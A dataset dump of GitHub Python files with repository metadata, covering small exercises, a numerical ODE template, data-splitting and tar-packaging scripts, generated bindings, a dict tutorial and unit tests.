blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d45b69041b2d7b4260f82033c88baa86e258533e | f74bf8257ebab029d6602178f25b607691e1c73a | /Assignments/sixteen.py | f5cba5727436b5108e13c2c3d4821b7a6fe2789f | [] | no_license | Nipurnj62/Data-Science-class | f6562bd9b2e738c1b1c6522fe5f56dab3cc03be8 | 9def17f484ee77c20d95f6b1de536cb13c4e2d68 | refs/heads/master | 2021-06-19T04:46:45.844423 | 2021-03-29T01:25:13 | 2021-03-29T01:25:13 | 194,601,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | new_list=input("enter some numbers")
# Keep only the odd numbers from the comma-separated input string.
outputlist=[i for i in new_list.split(',') if (int(i)%2!=0)]
print(' '.join(outputlist)) | [
"nipurnj62@gmail.com"
] | nipurnj62@gmail.com |
c55ea7bf368312fbf83a68848d1ea73bed091b7b | 0df9567a63aab012dabb4200e008fa3ce428f612 | /src/src-ch1/solitaryWave_fill.py | 173c55afc0c5f5b74546b7f8bae94f2b0096c5cd | [] | no_license | hong-hanh-dang/tkt4140 | 11c5690f3d655921ab1c441d09e2c3068109d74d | a3cf070091e2a31ad732fc2df4ea2e8f7fd5d125 | refs/heads/master | 2021-07-14T18:44:50.455440 | 2017-10-20T11:35:15 | 2017-10-20T11:35:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,875 | py | # src-ch1/solitaryWave.py
# NOTE(review): student fill-in template -- the bare `f0 =` / `f1 =`
# lines below are intentionally incomplete, and the prints use Python 2
# statement syntax, so this file does not run as-is.
#import matplotlib; matplotlib.use('Qt4Agg')
import matplotlib.pylab as plt
#plt.get_current_fig_manager().window.raise_()
import numpy as np
#### set default plot values: ####
LNWDT=3; FNT=15
plt.rcParams['lines.linewidth'] = LNWDT; plt.rcParams['font.size'] = FNT
""" This script solves the problem with the solitary wave:
y'' = a*3*y*(1-y*3/2)
y(0) = 1, y'(0) = 0
or as a system of first order differential equations (y0 = y, y1 = y'):
y0' = y'
y1' = a*3*y0*(1-y0*3/2)
y0(0) = 1, y1(0) = 0
"""
a = 2./3
h = 0.2 # steplength dx
x_0, x_end = 0, 0.6
x = np.arange(x_0, x_end + h, h) # allocate x values
#### solution vectors: ####
Y0_euler = np.zeros_like(x) # array to store y values
Y1_euler = np.zeros_like(x) # array to store y' values
Y0_heun = np.zeros_like(x)
Y1_heun = np.zeros_like(x)
#### initial conditions: ####
Y0_euler[0] = 1 # y(0) = 1
Y1_euler[0] = 0 # y'(0) = 0
Y0_heun[0] = 1
Y1_heun[0] = 0
#### solve with euler's method ####
# Explicit (forward) Euler step: y_{n+1} = y_n + h*f(y_n).
for n in range(len(x) - 1):
    y0_n = Y0_euler[n] # y at this timestep
    y1_n = Y1_euler[n] # y' at this timestep
    "Fill in lines below"
    # f0/f1 must be set to the right-hand side of the first-order
    # system in the module docstring, evaluated at (y0_n, y1_n).
    f0 =
    f1 =
    "Fill in lines above"
    Y0_euler[n + 1] = y0_n + h*f0
    Y1_euler[n + 1] = y1_n + h*f1
#### solve with heun's method: ####
# Heun's method (predictor-corrector): Euler predictor, then average
# the slopes at y_n and at the predicted point (see update below).
for n in range(len(x) - 1):
    y0_n = Y0_heun[n] # y0 at this timestep (y_n)
    y1_n = Y1_heun[n] # y1 at this timestep (y'_n)
    "Fill in lines below"
    # f0/f1: slopes at y_n; y0_p/y1_p: Euler predictor values;
    # f0_p/f1_p: slopes evaluated at the predictor point.
    f0 =
    f1 =
    y0_p =
    y1_p =
    f0_p =
    f1_p =
    "Fill in lines above"
    Y0_heun[n + 1] = y0_n + 0.5*h*(f0 + f0_p)
    Y1_heun[n + 1] = y1_n + 0.5*h*(f1 + f1_p)
# Reference solutions: truncated Taylor expansion and the closed-form
# sech^2 profile.
Y0_taylor = 1 - x**2/2 + x**4/6
Y1_taylor = -x + (2./3)*x**3
Y0_analytic = 1./(np.cosh(x/np.sqrt(2))**2)
#### Print and plot solutions: ####
print "a) euler's method: y({0})={1}, y'({2})={3}".format(x_end, round(Y0_euler[-1], 4), x_end, round(Y1_euler[-1], 4))
print "b) heun's method: y({0})={1}, y'({2})={3}".format(x_end, round(Y0_heun[-1], 4), x_end, round(Y1_heun[-1], 4))
print "c) Taylor series: y({0})={1}, y'({2})={3}".format(x_end, round(Y0_taylor[-1], 4), x_end, round(Y1_taylor[-1], 4))
print "d) Analytical solution: y({0})={1}".format(x_end, round(Y0_analytic[-1], 4))
plt.figure()
plt.plot(x, Y0_euler, 'r-o')
plt.plot(x, Y0_heun, 'b-^')
plt.plot(x, Y0_taylor, 'g-*')
plt.plot(x, Y0_analytic, 'k--')
eulerLegend = 'euler, y({0})={1}'.format(x_end, round(Y0_euler[-1], 4))
heunLegend = 'heun, y({0})={1}'.format(x_end, round(Y0_heun[-1], 4))
taylorLegend = 'taylor, y({0})={1}'.format(x_end, round(Y0_taylor[-1], 4))
analyticLegend = 'analytic, y({0})={1}'.format(x_end, round(Y0_analytic[-1], 4))
plt.legend([eulerLegend, heunLegend, taylorLegend, analyticLegend], loc='best', frameon=False)
plt.show()
| [
"leif.r.hellevik@ntnu.no"
] | leif.r.hellevik@ntnu.no |
3434db1840ba2cf28143ffff4c81e6aeca86c460 | 0180dc800ce935599cfcd59d0b33c58a765ed9f6 | /helloWorld.py | 49b7c6c620a20e0c1fc23772c82c2243104c35e5 | [] | no_license | gxxru-xx/helloPython | 4fd3288b4a4c0f8ad9f0a245f321b324c33fe9e2 | ff6b85e72b863fb3b961d9f5f9630a311936cde5 | refs/heads/master | 2022-10-29T08:46:17.984225 | 2018-06-26T12:43:56 | 2018-06-26T12:43:56 | 138,736,561 | 0 | 1 | null | 2022-10-02T23:50:03 | 2018-06-26T12:43:07 | Python | UTF-8 | Python | false | false | 337 | py | import random
import sys
import os
tested_string = "ABX"
alphabet = [0] * 256
ind = 0
flague = 0
for i in range(0, len(tested_string)):
ind = ord(tested_string[i])
alphabet[ind] += 1
if alphabet[ind] == 2:
print(chr(ind))
flague = 1
break
if flague == 0:
print("No recurrent characters found")
| [
"mateusiak.piotr@gmail.com"
] | mateusiak.piotr@gmail.com |
59fdb4c109f74526d8dec4f3b43562086178e9a8 | 4261091222a40eeb6a13c2bbb7e515340be2adc1 | /Uploads/test.py | 5cde8a9fd1e2218009ba6644c0cd0a428ba558eb | [] | no_license | safouman/ScheidtBachman_Middleware | 0e9697ac7987c676626d41d3cabb1b9bb3845652 | fae774cb772a2c37bc8cd85080d68eaeb1ca2d7a | refs/heads/master | 2021-01-20T21:12:18.010424 | 2017-08-10T12:21:02 | 2017-08-10T12:21:02 | 65,056,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | import argparse
from Logging_Config.Logger import Logger
# Build the CLI: both -i/--input and -n/--name are mandatory.
parser = argparse.ArgumentParser(
    description='THIS SCRIPT SERVES AS A MIDDLEWARE FOR INPUT DATA YOU CAN MODIFY YOUR DATA HERE ')
parser.add_argument('-i', '--input', help='Input data', required=True)
parser.add_argument('-n', '--name', help='Name', required=True)
args = parser.parse_args()
# Logger is constructed from the raw input value -- see
# Logging_Config.Logger for how that is used.
logger = Logger(args.input).get()
try:
    # ADDING ARGUMENT TO THE SCRIPT
    logger.info("%s ready to start",args.name)
    # HERE YOU CAN DO WHATEVER YOU WANT WITH THE INPUT DATA
    logger.info("Received data: %s ", str(args.input))
    ##############################START CODING FROM HERE###################"
    # YOU NEED TO PRINT YOUR OUTPUT SO THE APP CAN CATCH IT
    # NOTE(review): Python 2 print statement -- this file will not run
    # under Python 3 as-is.
    print args.input+'555555'
except Exception as e:
    logger.error('ERROR %s', e)
| [
"safouman@gmail.com"
] | safouman@gmail.com |
74be74cb99d2362e431410164bca951e2487f848 | 0b110ef4139abb720636b19d10e88e7332849266 | /packages/jsii-pacmak/test/expected.jsii-calc/python/src/jsii_calc/python_self/__init__.py | 5d63911e34b6bbff8bf5a53687fce452ee266d8c | [
"ISC",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | sullis/jsii | 2f2f3690ffd3e8dfeb57d9649c1323c3bc3263d4 | f124bc8b0ebf9243f45c59be6209ca01fd967dea | refs/heads/master | 2023-01-28T08:40:01.435441 | 2020-07-22T14:40:07 | 2020-07-22T14:40:07 | 200,978,923 | 1 | 0 | Apache-2.0 | 2023-01-24T01:38:33 | 2019-08-07T05:32:38 | TypeScript | UTF-8 | Python | false | false | 3,438 | py | import abc
import builtins
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
from .._jsii import *
# NOTE(review): appears to be generated jsii binding code (path suggests
# a golden test fixture). The receiver is named `self_` because the
# bound API exposes a parameter literally called `self`.
class ClassWithSelf(
    metaclass=jsii.JSIIMeta, jsii_type="jsii-calc.PythonSelf.ClassWithSelf"
):
    """
    stability
    :stability: experimental
    """
    def __init__(self_, self: str) -> None:
        """
        :param self: -
        stability
        :stability: experimental
        """
        jsii.create(ClassWithSelf, self_, [self])
    @jsii.member(jsii_name="method")
    def method(self_, self: jsii.Number) -> str:
        """
        :param self: -
        stability
        :stability: experimental
        """
        return jsii.invoke(self_, "method", [self])
    @builtins.property
    @jsii.member(jsii_name="self")
    def self(self) -> str:
        """
        stability
        :stability: experimental
        """
        return jsii.get(self, "self")
# NOTE(review): appears to be generated jsii binding code; the
# keyword-only `self` argument is wrapped into a StructWithSelf props
# object before being handed to the jsii kernel.
class ClassWithSelfKwarg(
    metaclass=jsii.JSIIMeta, jsii_type="jsii-calc.PythonSelf.ClassWithSelfKwarg"
):
    """
    stability
    :stability: experimental
    """
    def __init__(self_, *, self: str) -> None:
        """
        :param self:
        stability
        :stability: experimental
        """
        props = StructWithSelf(self=self)
        jsii.create(ClassWithSelfKwarg, self_, [props])
    @builtins.property
    @jsii.member(jsii_name="props")
    def props(self) -> "StructWithSelf":
        """
        stability
        :stability: experimental
        """
        return jsii.get(self, "props")
# NOTE(review): generated-looking jsii interface (Protocol); at runtime
# instances are backed by _IInterfaceWithSelfProxy (see
# __jsii_proxy_class__ below). `method` is a stub (`...` body).
@jsii.interface(jsii_type="jsii-calc.PythonSelf.IInterfaceWithSelf")
class IInterfaceWithSelf(jsii.compat.Protocol):
    """
    stability
    :stability: experimental
    """
    @builtins.staticmethod
    def __jsii_proxy_class__():
        return _IInterfaceWithSelfProxy
    @jsii.member(jsii_name="method")
    def method(self_, self: jsii.Number) -> str:
        """
        :param self: -
        stability
        :stability: experimental
        """
        ...
# NOTE(review): runtime proxy for IInterfaceWithSelf -- forwards
# `method` calls through the jsii kernel.
class _IInterfaceWithSelfProxy:
    """
    stability
    :stability: experimental
    """
    __jsii_type__ = "jsii-calc.PythonSelf.IInterfaceWithSelf"
    @jsii.member(jsii_name="method")
    def method(self_, self: jsii.Number) -> str:
        """
        :param self: -
        stability
        :stability: experimental
        """
        return jsii.invoke(self_, "method", [self])
# NOTE(review): generated-looking jsii data type. The struct has a
# single field literally named "self", hence the keyword-only argument
# and the `self_` receiver; values live in the `_values` dict.
@jsii.data_type(
    jsii_type="jsii-calc.PythonSelf.StructWithSelf",
    jsii_struct_bases=[],
    name_mapping={"self": "self"},
)
class StructWithSelf:
    def __init__(self_, *, self: str) -> None:
        """
        :param self:
        stability
        :stability: experimental
        """
        self_._values = {
            "self": self,
        }
    @builtins.property
    def self(self) -> str:
        """
        stability
        :stability: experimental
        """
        return self._values.get("self")
    def __eq__(self, rhs) -> bool:
        return isinstance(rhs, self.__class__) and rhs._values == self._values
    def __ne__(self, rhs) -> bool:
        return not (rhs == self)
    def __repr__(self) -> str:
        return "StructWithSelf(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
# Explicit public API of the module; publication.publish() is the
# `publication` package's hook that enforces these exports.
__all__ = [
    "ClassWithSelf",
    "ClassWithSelfKwarg",
    "IInterfaceWithSelf",
    "StructWithSelf",
]
publication.publish()
| [
"noreply@github.com"
] | sullis.noreply@github.com |
0c951d03079b7356ec0f67cbf8d87e34b58a4537 | 1edf4c50123a6001b30cff3ad098d566f058ed8f | /utility/dataSplit.py | d7b3bfe61f47b3d43122e90d8c00effdac2fb8d1 | [] | no_license | HaohanWang/geneExpressionRepresentation | be19fa9c89b55063f22614bf6938249275264369 | 5e6881f7e5f3c3a04325437a4894387219e852b8 | refs/heads/master | 2021-01-10T17:44:36.209021 | 2016-05-03T05:44:19 | 2016-05-03T05:44:19 | 50,133,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,246 | py | import numpy as np
# ids = [line.strip() for line in open('../data/ids.txt')]
#
# text = [line.strip() for line in open('../data/ppi_ids.txt')]
#
# ppi = {}
#
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# ppi[(id1, id2)] = 0
#
# count = 0
#
# p = []
# n = []
# np.random.seed(1)
#
# for id1 in ids:
# count += 1
# if count %100==0:
# print id1
# for id2 in ids:
# if (id1, id2) in ppi:
# p.append((id1, id2))
# else:
# if np.random.random() < 0.00017:
# n.append((id1, id2))
#
# print len(n)
# p = p[:12500]
# n = n[:12500]
#
# for i in range(5):
# f1 = open('../data/split/ids_train_'+str(i+1)+'.txt', 'w')
# f2 = open('../data/split/ids_test_'+str(i+1)+'.txt', 'w')
# f1_ = open('../data/split/labels_train_'+str(i+1)+'.txt', 'w')
# f2_ = open('../data/split/labels_test_'+str(i+1)+'.txt', 'w')
#
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f2_.writelines('1\n')
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f2_.writelines('0\n')
#
# for k in range(0, i*2500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
#
# for k in range(0, i*2500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
#
# f1.close()
# f2.close()
# f1_.close()
# f2_.close()
# Load the gene ids (one per line) and the expression matrix; row i of
# `data` corresponds to ids[i]. (Python 2: statement-form prints.)
ids = [line.strip() for line in open('../data/ids.txt')]
print len(ids)
data = np.loadtxt('../data/ge.csv', delimiter=',')
print data.shape
# Map gene id -> its expression vector (row of `data`).
ge = {}
for i in range(len(ids)):
    ge[ids[i]] = data[i,:]
#
# for i in range(5):
# t1l = []
# t1r = []
# t2l = []
# t2r = []
#
# #train
# text = [line.strip() for line in open('../data/split/ids_train_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t1l.append(ge[id1])
# t1r.append(ge[id2])
# np.savetxt('../data/split/data_train_'+str(i+1)+'_a.txt', t1l, delimiter=',')
# np.savetxt('../data/split/data_train_'+str(i+1)+'_b.txt', t1r, delimiter=',')
#
# #test
# text = [line.strip() for line in open('../data/split/ids_test_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t2l.append(ge[id1])
# t2r.append(ge[id2])
# np.savetxt('../data/split/data_test_'+str(i+1)+'_a.txt', t2l, delimiter=',')
# np.savetxt('../data/split/data_test_'+str(i+1)+'_b.txt', t2r, delimiter=',')
# For each id pair in ids_final.txt, gather the expression vectors of
# the left and right gene and save them as two row-aligned CSV files.
text = [line.strip() for line in open('../data/ids_final.txt')]
t1l = []
t1r = []
for line in text:
    items = line.split()
    id1 = items[0]
    id2 = items[1]
    t1l.append(ge[id1])
    t1r.append(ge[id2])
np.savetxt('../data/split/data_final_a.txt', t1l, delimiter=',')
np.savetxt('../data/split/data_final_b.txt', t1r, delimiter=',')
| [
"haohanw@andrew.cmu.edu"
] | haohanw@andrew.cmu.edu |
88c814afb0945567dd2ebac613efd519b7762bee | b11cd714862159d8fbf194e58244ad8c5dacd23c | /blog/models.py | 760fabe968fb5f9bc5a8546ab34300d7eff6b167 | [] | no_license | tjhooper1/django-portfolio | d25bf021cad6f180c00e3a56daea5081c6847c3d | f9150ce4ed31ba980744792ef62919ad089380d1 | refs/heads/master | 2020-12-28T00:40:15.645585 | 2020-02-11T03:46:54 | 2020-02-11T03:46:54 | 238,122,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | from django.db import models
# Create your models here.
class Blog(models.Model):
    """A portfolio blog post: title, body text and publish date."""
    title = models.CharField(max_length=200)
    description = models.TextField()
    date = models.DateField()
    def __str__(self):
        """Return the post title (shown e.g. in the Django admin)."""
        return self.title
| [
"tomh386@gmail.com"
] | tomh386@gmail.com |
9fc1f08a73738b003c3fb875629101d1a3136c61 | 28213f0414a769fff8502bc98fab5150a84ee764 | /Test/venv/Example/4/6.py | 5751d64efa8dfb670c5582fbd98493edce53f23c | [] | no_license | darkleave/python-test | 46c1a595e2c6120d9276096be8344a029fde1064 | fb98303001d2e71f1395ffec930c48b51fd7b2a7 | refs/heads/master | 2022-11-07T12:04:36.420997 | 2018-07-17T12:24:25 | 2018-07-17T12:24:25 | 139,572,846 | 0 | 1 | null | 2022-10-29T17:58:49 | 2018-07-03T11:21:43 | Python | UTF-8 | Python | false | false | 3,089 | py | #5. has_key
# The has_key method checks whether a dictionary contains a given key;
# the expression d.has_key(k) is equivalent to k in d.
# Which form you use is largely personal preference; Python 3.0 removed
# this method.
'''
d={}
hasTest = d.has_key('name')
print(hasTest)
d['name'] = 'Eric'
hasTest = d.has_key('name')
'''
#6 items and iteritems
# items returns all of the dictionary's items as a list, each item in
# (key, value) form; the items come back in no particular order.
d = {'title':'Python Web Site','url':'http://www.python.org','spam':0}
itemTest = d.items()
print(itemTest)
# iteritems behaves much the same but returns an iterator object
# instead of a list; removed in Python 3.0.
#it = d.iteritems()
#print(it)
#7. keys and iterkeys
# keys returns the dictionary's keys as a list, while iterkeys returns
# an iterator over the keys.
print(d.keys())
#print(d.iterkeys())  # removed in Python 3.0
#8. pop
# pop fetches the value for a given key and removes that key/value
# pair from the dictionary.
d = {'x':1,'y':2}
popTest = d.pop('x')
print(popTest)
print(d)
#9. popitem
# popitem is similar to list.pop, which pops the last element of a
# list; the difference is that popitem pops an arbitrary item, since
# dictionaries have no "last element" or any notion of order.
# It is handy for removing and processing items one by one (no need to
# fetch the key list first).
d = {'url':'http://www.python.org','spam':0,'title':'Python Web Site'}
popTest = d.popitem()
print(popTest)
print(d)
# Although popitem resembles list.pop, dictionaries have no equivalent
# of append: since they are unordered, an append-like method would be
# meaningless.
#10. setdefault
# setdefault is somewhat like get: it retrieves the value associated
# with a given key, but additionally it stores the value when the
# dictionary lacks the key.
d = {}
defaultTest = d.setdefault('name','N/A')
print('defaultTest:' + str(defaultTest))
print(d)
d['name'] = 'Gumby'
defaultTest = d.setdefault('name','N/A')
print(defaultTest)
print(d)
# As shown: when the key is missing, setdefault returns the default
# and updates the dictionary; when the key exists, it returns the
# stored value and leaves the dictionary unchanged. The default is
# optional, as with get; if omitted, None is used.
d = {}
print(d.setdefault('name'))
print(d)
#11. update
# update merges the items of one dictionary into another.
# Items from the supplied dictionary are added to the old one,
# overwriting entries that share the same key.
d = {
    'title':'Python Web Site',
    'url':'http://www.python.org',
    'changed':'Mar 14 22:09:15 MET 2008'
}
x = {'title':'Python Language Website','a':'aaaa'}
updateTest = d.update(x)
print('updateTest:' + str(updateTest))  # update mutates in place and returns None
print(d)
#12. values and itervalues
# values returns the dictionary's values as a list (itervalues returns
# an iterator over the values). Unlike the key list, the value list
# may contain duplicates.
d = {}
d[1] = 1
d[2] = 2
d[3] = 3
d[4] = 1
print(d.values())
| [
"zhonghanzhong@zhixueyun.com"
] | zhonghanzhong@zhixueyun.com |
c8271cb5873fb6ff12af7456d432b92a3abae723 | d3af16898953a9b9d5e12293f54767ab397d06d1 | /test_python/src/libai.py | 4e9d2f997b117f4cc082074089ec9ab0c3753d89 | [] | no_license | pystart-hyj/HogwartsLG5-hyj | 014f4649f915c2ba2af9584534d49ce92799bf57 | 65c53bfe2fac7e2d959e625490ba0f83cd54326a | refs/heads/main | 2023-04-06T15:55:26.514696 | 2021-03-21T11:47:10 | 2021-03-21T11:47:10 | 322,327,759 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | from test_python.src.hero import *
class LiBai(Hero):
    """Hero subclass for Li Bai with preset class-level stats.

    Hero is star-imported from test_python.src.hero -- presumably it
    defines the shared hero behaviour; verify against that module.
    """
    hp = 80
    speed = 2
    name = '李白'
tools = [] | [
"“pystart-hyj@email.comgit config --global user.email “pystart-hyj@email.com"
] | “pystart-hyj@email.comgit config --global user.email “pystart-hyj@email.com |
075d141b1d7639164a27def725f825198ea7ae10 | c37acc989e77c42757bfae1bd0bececeeb821071 | /env/bin/easy_install-2.7 | 5f52fe7a7f82b9e9cdbbf35e41786a6c7dbf0a98 | [] | no_license | sohaveaniceday/lambda-test | 0504518f5696a62c2cee892ed769030059d8f804 | 16bf910c92f403b81f55fc074574e8b23df8dfc2 | refs/heads/master | 2020-05-24T02:42:24.002280 | 2019-05-18T07:44:37 | 2019-05-18T07:44:37 | 187,057,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | 7 | #!/Users/richardturner/Documents/Developer/Projects/lambda-test/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # setuptools console-script shim: strip the "-script.pyw"/".exe"
    # suffix from argv[0], then delegate to easy_install's main().
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"rclt201@gmail.com"
] | rclt201@gmail.com |
11b350fe81bcb1a68ce3436a03d2a36d6b23c074 | e9e8599822914b4ed33ce0ca1bf1b92391a27003 | /python/tarPackages.py | 771a84ded5314214e0f0b7451cf490f52843b1de | [] | no_license | Kinice/PlyThings | d049d9196767ad6db33dba92e2be9efb72536116 | 11343664e95367f9e7144c1a1645d351ce91ee25 | refs/heads/master | 2023-01-24T07:42:38.911824 | 2020-11-09T06:38:27 | 2020-11-09T06:38:27 | 46,183,415 | 3 | 1 | null | 2023-01-12T09:55:28 | 2015-11-14T17:03:19 | HTML | UTF-8 | Python | false | false | 3,200 | py | #coding=utf-8
import os,tarfile,datetime
ROOTDIR = os.path.abspath('.')
ROOTFILELIST = os.listdir(ROOTDIR)
txtFileName = 'time.txt'
hasTxt = False
rootDirs = []
diffLines = []
diffDir = []
txtList = []
files = []
timeList = []
def tarFiles(rootDir,fileList):
    """Create <name>.tar in the CWD for each directory name in fileList.

    Entries of fileList that are not directories under rootDir are
    skipped. Python 2 (statement-form print).
    NOTE(review): the archive is not closed if tar.add() raises, and
    the loop names `dir` and `file` shadow builtins.
    """
    for i in range(0,len(fileList)):
        fPath = os.path.join(rootDir,fileList[i])
        if os.path.isdir(fPath):
            # Archive is named after the directory's basename.
            tar = tarfile.open(fileList[i]+'.tar','w')
            print '正在打包 ',rootDir,fileList[i]  # "packing ..."
            for root,dir,files in os.walk(fPath):
                for file in files:
                    fullpath = os.path.join(root,file)
                    tar.add(fullpath)
            tar.close()
def getFileList(rootDir):
    """Return the paths of all files found recursively under rootDir.

    Rewritten on top of os.walk. The previous hand-rolled DFS tracked
    visited entries by basename only, so any file or directory whose
    name repeated anywhere else in the tree (or matched rootDir's own
    basename) was silently skipped -- e.g. a/x.txt and b/x.txt could
    never both be returned. Callers in this script only test membership
    of the result, so the traversal order change is harmless.
    """
    allfiles = []
    for dirpath, dirnames, filenames in os.walk(rootDir):
        for filename in filenames:
            allfiles.append(os.path.join(dirpath, filename))
    return allfiles
def getFileStat(flist):
    """Return manifest lines '<path> <mtime YYYY-mm-dd HH:MM:SS>' for flist."""
    print '正在读取文件信息'  # "reading file information" (Python 2 print)
    timeList = []
    for i in range(0,len(flist)):
        mtime = os.stat(flist[i]).st_mtime
        date = datetime.datetime.fromtimestamp(mtime)
        timeList.append(flist[i]+' '+date.strftime('%Y-%m-%d %H:%M:%S'))
    return timeList
def createTxt(dir,name,tlist):
    """Write each entry of tlist as one line of the file <dir>/<name>.

    NOTE(review): the parameter name `dir` shadows the builtin.
    """
    print '正在生成',name,'资源文件'  # "generating resource file" (Python 2 print)
    f = open(os.path.join(dir,name),'w')
    for i in tlist:
        f.write(i)
        f.write('\n')
    f.close()
# Partition the working directory's entries: sub-directories that are
# candidates for archiving vs. the existing time.txt manifest, if any.
for i in ROOTFILELIST:
    if os.path.isdir(os.path.join(ROOTDIR,i)):
        rootDirs.append(os.path.join(ROOTDIR,i))
    else:
        if i == txtFileName:
            hasTxt = True
print '正在读取文件列表'  # "reading file list" (Python 2 print)
for i in rootDirs:
    l = getFileList(os.path.join(ROOTDIR,i))
    if(len(l)>0):
        for j in l:
            files.append(j)
timeList = getFileStat(files)
if hasTxt:
    # Compare the fresh path+mtime lines with the stored manifest; any
    # difference (added, removed or modified file) marks that file's
    # directory for re-packing.
    f = open(os.path.join(ROOTDIR,txtFileName),'r')
    for line in f:
        txtList.append(line.strip('\n'))
    f.close()
    for i in timeList:
        if i not in txtList:
            diffLines.append(i)
    for i in txtList:
        if i not in timeList:
            diffLines.append(i)
    if len(diffLines)>0:
        for i in diffLines:
            # i[:-20] strips the trailing ' YYYY-mm-dd HH:MM:SS'
            # timestamp (20 characters), leaving the file path.
            if os.path.basename(os.path.dirname(i[:-20])) not in diffDir:
                diffDir.append(os.path.basename(os.path.dirname(i[:-20])))
        tarFiles(ROOTDIR,diffDir)
        createTxt(ROOTDIR,txtFileName,timeList)
    else:
        print '检测无文件修改'  # "no file changes detected"
else:
    # First run: write the manifest and archive every directory.
    createTxt(ROOTDIR,txtFileName,timeList)
    tarFiles(ROOTDIR,rootDirs)
| [
"szp93@126.com"
] | szp93@126.com |
30665cc9a04c96f8151128447b3694303cff9e74 | 293b7305b86628aa92e23ea10f799b4848661aa5 | /implugin/flashmsg/tests/test_models.py | 6cc1793d411b7303753914717ef8ebcdde503af4 | [] | no_license | socek/impaf-flashmsg | 2ce751c54ff8d9e95f38a691b3579320e3ace546 | 4af4355934f6edf512893f7e9dacfe188179ea62 | refs/heads/master | 2020-04-08T20:58:21.124723 | 2015-08-14T18:05:55 | 2015-08-14T18:05:55 | 38,713,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | from mock import sentinel
from impaf.testing import PyTestCase
from ..models import FlashMessage
class TestFlasMessage(PyTestCase):
    """Tests FlashMessage's to_dict/from_dict round-tripping.

    PyTestCase's `self.object(...)` appears to construct instances of
    `_object_cls` -- verify against impaf.testing. mock.sentinel
    values stand in for the message payload and type.
    """
    _object_cls = FlashMessage
    def test_to_dict(self):
        # to_dict must expose message and msgtype verbatim.
        obj = self.object(sentinel.message, sentinel.msgtype)
        assert obj.to_dict() == {
            'message': sentinel.message,
            'msgtype': sentinel.msgtype,
        }
    def test_from_dict(self):
        # from_dict must populate the attributes from the mapping.
        obj = self.object()
        obj.from_dict({
            'message': sentinel.message,
            'msgtype': sentinel.msgtype,
        })
        assert obj.message == sentinel.message
        assert obj.msgtype == sentinel.msgtype
| [
"msocek@gmail.com"
] | msocek@gmail.com |
d63747c6b66f1cc13f19fbcc2e2a70e2493c87b2 | f12745e64ef5c58d7b465e4d00a72d1a9a48dc3c | /test.py | 086956571aeff9da45590d0a857777d6564234aa | [] | no_license | yyf330/endpointdemononthrinf | 47b7ae668271fe4f839e3c9e1ce41e9a2c34b423 | 815e9d1a26690bbbd1cfb926ab5830148ca3a93a | refs/heads/master | 2021-08-19T19:59:12.521992 | 2017-11-27T09:31:52 | 2017-11-27T09:31:52 | 111,651,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | import socket
def get_host_ip():
    """Return the IP address this host would use for outbound traffic.

    "Connects" a UDP socket to a public address (no packets are sent
    for a UDP connect) and reads back the locally chosen address.

    Returns:
        str: the local IP address, e.g. '192.168.1.5'.
    Raises:
        OSError: if no route to the target address is available.
    """
    # `with` guarantees the socket is closed even if connect() raises.
    # The original closed in a bare `finally:` and raised NameError
    # whenever socket() itself failed before `s` was ever bound.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(('8.8.8.8', 80))
        return s.getsockname()[0]
print(get_host_ip())
| [
"‘daolin@qq.com’"
] | ‘daolin@qq.com’ |
